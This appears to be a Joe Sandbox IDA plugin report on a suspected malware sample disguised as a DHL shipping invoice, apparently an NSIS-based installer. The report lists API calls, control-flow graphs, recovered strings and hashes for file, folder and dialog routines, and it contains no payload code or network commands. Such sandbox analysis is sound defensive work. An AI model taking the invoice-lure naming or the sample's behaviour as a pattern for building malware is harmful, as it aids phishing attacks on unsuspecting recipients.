                                                                                                                                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                                                      • API String ID: 2171350718-461813615
                                                                                                                                                                                                                                      • Opcode ID: f8d4e974cc956983b46bcde362b03df5d37b76f918305d7ec0ca4ec5166a0624
                                                                                                                                                                                                                                      • Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8d4e974cc956983b46bcde362b03df5d37b76f918305d7ec0ca4ec5166a0624
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 646 404722-40474c 647 40474e-40475a call 405904 call 40654e 646->647 648 40475f-404769 646->648 647->648 650 4047d7-4047de 648->650 651 40476b-404781 GetDlgItem call 405c06 648->651 654 4047e4-4047ed 650->654 655 4048b5-4048bc 650->655 662 404793-4047cc SetWindowTextW call 404231 * 2 call 404266 call 406694 651->662 663 404783-40478b call 405c3a 651->663 658 404807-40480c 654->658 659 4047ef-4047fa 654->659 660 4048cb-4048e6 call 405904 call 405c97 655->660 661 4048be-4048c5 655->661 658->655 666 404812-404854 call 4062dc SHBrowseForFolderW 658->666 664 404800 659->664 665 404a63-404a75 call 404298 659->665 685 4048e8 660->685 686 4048ef-404907 call 4062ba call 406694 660->686 661->660 661->665 662->665 701 4047d2-4047d4 662->701 663->662 682 40478d-40478e call 405b8f 663->682 664->658 679 404856-404870 CoTaskMemFree call 405b8f 666->679 680 4048ae 666->680 692 404872-404878 679->692 693 40489a-4048ac SetDlgItemTextW 679->693 680->655 682->662 685->686 703 404943-404954 call 4062ba call 405c3a 686->703 704 404909-40490f 686->704 692->693 696 40487a-404891 call 4062dc lstrcmpiW 692->696 693->655 696->693 706 404893-404895 lstrcatW 696->706 701->650 714 404956 703->714 715 404959-404972 GetDiskFreeSpaceW 703->715 704->703 707 404911-404923 704->707 706->693 712 404925-404927 707->712 713 40499b-4049b5 707->713 717 404929 712->717 718 40492c-404941 call 405bdb 712->718 716 4049b7 713->716 714->715 715->716 719 404974-404999 MulDiv 715->719 720 4049bc-4049c6 call 404bbf 716->720 717->718 718->703 718->707 719->720 725 4049e1-4049ea 720->725 726 4049c8-4049cf 720->726 727 404a1c-404a26 725->727 728 4049ec-4049fc call 404ba7 725->728 726->725 729 4049d1 726->729 731 404a32-404a38 727->731 732 404a28-404a2f call 40140b 727->732 740 404a0e-404a17 SetDlgItemTextW 728->740 741 4049fe-404a0c call 404ade 728->741 733 4049d3-4049d8 729->733 734 4049da 729->734 737 404a3a 731->737 738 404a3d-404a4e call 404253 731->738 732->731 733->725 733->734 734->725 737->738 745 404a50-404a56 738->745 746 404a5d 738->746 740->727 741->727 745->746 748 404a58 call 40467b 745->748 746->665 748->746
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00432E80,0042D248,00000000,?,?), ref: 00404889
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,00432E80), ref: 00404895
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                                                                                                                                                                                                                        • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00000400,004048DE), ref: 00405917
                                                                                                                                                                                                                                        • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00441800,00441800,0043F000,0040336A,00441800,757C3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                                                                        • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                                                                                                        • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,00441800,00441800,0043F000,0040336A,00441800,757C3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                                                                        • Part of subcall function 0040654E: CharPrevW.USER32(?,?,00441800,00441800,0043F000,0040336A,00441800,757C3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040496A
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                                                                                                                                                                                                                        • Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                                                                        • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                                                                        • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: A
                                                                                                                                                                                                                                      • API String ID: 2624150263-3554254475
                                                                                                                                                                                                                                      • Opcode ID: 0e7a3ef283d1d7ec7faeb562c0eda326dd22e556ee24bddd125c463040a43afb
                                                                                                                                                                                                                                      • Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e7a3ef283d1d7ec7faeb562c0eda326dd22e556ee24bddd125c463040a43afb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 750 402edd-402f2b GetTickCount GetModuleFileNameW call 405db0 753 402f37-402f65 call 4062ba call 405bdb call 4062ba GetFileSize 750->753 754 402f2d-402f32 750->754 762 403052-403060 call 402e79 753->762 763 402f6b 753->763 755 40310f-403113 754->755 769 403062-403065 762->769 770 4030b5-4030ba 762->770 764 402f70-402f87 763->764 767 402f89 764->767 768 402f8b-402f94 call 403331 764->768 767->768 776 402f9a-402fa1 768->776 777 4030bc-4030c4 call 402e79 768->777 772 403067-40307f call 403347 call 403331 769->772 773 403089-4030b3 GlobalAlloc call 403347 call 403116 769->773 770->755 772->770 796 403081-403087 772->796 773->770 801 4030c6-4030d7 773->801 780 402fa3-402fb7 call 405d6b 776->780 781 40301d-403021 776->781 777->770 787 40302b-403031 780->787 799 402fb9-402fc0 780->799 786 403023-40302a call 402e79 781->786 781->787 786->787 792 403040-40304a 787->792 793 403033-40303d call 406787 787->793 792->764 800 403050 792->800 793->792 796->770 796->773 799->787 805 402fc2-402fc9 799->805 800->762 802 4030d9 801->802 803 4030df-4030e4 801->803 802->803 806 4030e5-4030eb 803->806 805->787 807 402fcb-402fd2 805->807 806->806 808 4030ed-40310d SetFilePointer call 405d6b 806->808 807->787 809 402fd4-402fdb 807->809 808->755 809->787 811 402fdd-402ffd 809->811 811->770 812 403003-403007 811->812 814 403009-40300d 812->814 815 40300f-403017 812->815 814->800 814->815 815->787 816 403019-40301b 815->816 816->787
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                                                                                                                        • Part of subcall function 00405DB0: GetFileAttributesW.KERNEL32(00442800,00402F1D,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                                                        • Part of subcall function 00405DB0: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Null, xrefs: 00402FD4
                                                                                                                                                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                                                                                                                                                                                      • soft, xrefs: 00402FCB
                                                                                                                                                                                                                                      • Error launching installer, xrefs: 00402F2D
                                                                                                                                                                                                                                      • Inst, xrefs: 00402FC2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                      • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                      • Opcode ID: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                                                                                                                                                                                      • Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 817 4062dc-4062e7 818 4062e9-4062f8 817->818 819 4062fa-406310 817->819 818->819 820 406316-406323 819->820 821 406528-40652e 819->821 820->821 824 406329-406330 820->824 822 406534-40653f 821->822 823 406335-406342 821->823 825 406541-406545 call 4062ba 822->825 826 40654a-40654b 822->826 823->822 827 406348-406354 823->827 824->821 825->826 829 406515 827->829 830 40635a-406398 827->830 833 406523-406526 829->833 834 406517-406521 829->834 831 4064b8-4064bc 830->831 832 40639e-4063a9 830->832 835 4064be-4064c4 831->835 836 4064ef-4064f3 831->836 837 4063c2 832->837 838 4063ab-4063b0 832->838 833->821 834->821 840 4064d4-4064e0 call 4062ba 835->840 841 4064c6-4064d2 call 406201 835->841 843 406502-406513 lstrlenW 836->843 844 4064f5-4064fd call 4062dc 836->844 842 4063c9-4063d0 837->842 838->837 839 4063b2-4063b5 838->839 839->837 845 4063b7-4063ba 839->845 855 4064e5-4064eb 840->855 841->855 847 4063d2-4063d4 842->847 848 4063d5-4063d7 842->848 843->821 844->843 845->837 851 4063bc-4063c0 845->851 847->848 853 406412-406415 848->853 854 4063d9-406400 call 406188 848->854 851->842 858 406425-406428 853->858 859 406417-406423 GetSystemDirectoryW 853->859 866 4064a0-4064a3 854->866 867 406406-40640d call 4062dc 854->867 855->843 857 4064ed 855->857 863 4064b0-4064b6 call 40654e 857->863 860 406493-406495 858->860 861 40642a-406438 GetWindowsDirectoryW 858->861 864 406497-40649b 859->864 860->864 865 40643a-406444 860->865 861->860 863->843 864->863 868 40649d 864->868 871 406446-406449 865->871 872 40645e-406474 SHGetSpecialFolderLocation 865->872 866->863 874 4064a5-4064ab lstrcatW 866->874 867->864 868->866 871->872 875 40644b-40645c 871->875 876 406476-40648d SHGetPathFromIDListW CoTaskMemFree 872->876 877 40648f 872->877 874->863 875->864 875->872 876->864 876->877 877->860
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00432E80,00000400), ref: 0040641D
                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(00432E80,00000400,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406430
                                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00405359,?,00000000,0042C228,?,00405359,0042C228,00000000), ref: 0040646C
                                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(?,00432E80), ref: 0040647A
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 00406485
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00432E80,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00432E80,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406503
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 004063ED
                                                                                                                                                                                                                                      • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004064A5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                      • API String ID: 717251189-730719616
                                                                                                                                                                                                                                      • Opcode ID: e07025652e73fd573f6e327d7dbd94b5af98cadfbb304e7c9a8d62640b3ffd73
                                                                                                                                                                                                                                      • Instruction ID: 29f0adb049bea166a756856afc1b7ff582c4fdfd81cc2e884c30b49282791dbd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e07025652e73fd573f6e327d7dbd94b5af98cadfbb304e7c9a8d62640b3ffd73
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6611071A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 34651D1B
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 34651D37
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 34651D4B
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 34651D58
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 34651D72
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 34651D7D
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 34651D8A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1454806937-0
                                                                                                                                                                                                                                      • Opcode ID: 204dcae4f7c511869467b55a2d2b62133b44134b3152805d545e8356f489172f
                                                                                                                                                                                                                                      • Instruction ID: 0b2437504f473596d9f749b5f0403a79572cc3156af669b7eeeb223f990c22bd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 204dcae4f7c511869467b55a2d2b62133b44134b3152805d545e8356f489172f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0212AB194121CBFEB10DFA0DC8CFEB76ACEB18358F0049E5F511E2181DA749E868A75
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 004042F3
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 0040430B
                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 0040431E
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 0040432E
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00404348
                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404352
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                                                                                      • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                                                      • Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CountTick$wsprintf
                                                                                                                                                                                                                                      • String ID: ... %d%%$@
                                                                                                                                                                                                                                      • API String ID: 551687249-3859443358
                                                                                                                                                                                                                                      • Opcode ID: 332a35644ce53e0492720e78fed1094326ce68f61c68911b2c6b8c231937ce50
                                                                                                                                                                                                                                      • Instruction ID: 5c504835c6c52170eea8577a9cac8da2a2598cbf1b76cdbdeb728d3f56fa2377
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 332a35644ce53e0492720e78fed1094326ce68f61c68911b2c6b8c231937ce50
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA517A71900219DBCB10DFA5DA84A9E7BB8AF04366F14417BEC14B72C0CB78DA40CBA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                                                                                                        • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                                      • String ID: 9
                                                                                                                                                                                                                                      • API String ID: 163830602-2366072709
                                                                                                                                                                                                                                      • Opcode ID: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                                                                                                                                                                                                      • Instruction ID: 0a1b8613d15e357d59cabb4a84863d73d9dad353ca9b6e0785da3ca47288b3a0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42511974D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB18
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                      • API String ID: 0-537541572
                                                                                                                                                                                                                                      • Opcode ID: c918500e354fcbfcd9efe27fdcc9ba619b090ef04217a02ac94ad5d63c0ac546
                                                                                                                                                                                                                                      • Instruction ID: 94ea9a2d34ddb9593ed5b25694c76c5913073cd9018e6ddda95179e948a7cccc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c918500e354fcbfcd9efe27fdcc9ba619b090ef04217a02ac94ad5d63c0ac546
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC11B476E01321BBE7129E689C84A0A375C9F91FA0F1041D4E855F72A1EB30DD81C6E2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(0042C228,00000000,?,757C23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(0040327A,0042C228,00000000,?,757C23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,?,757C23A0), ref: 0040537D
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
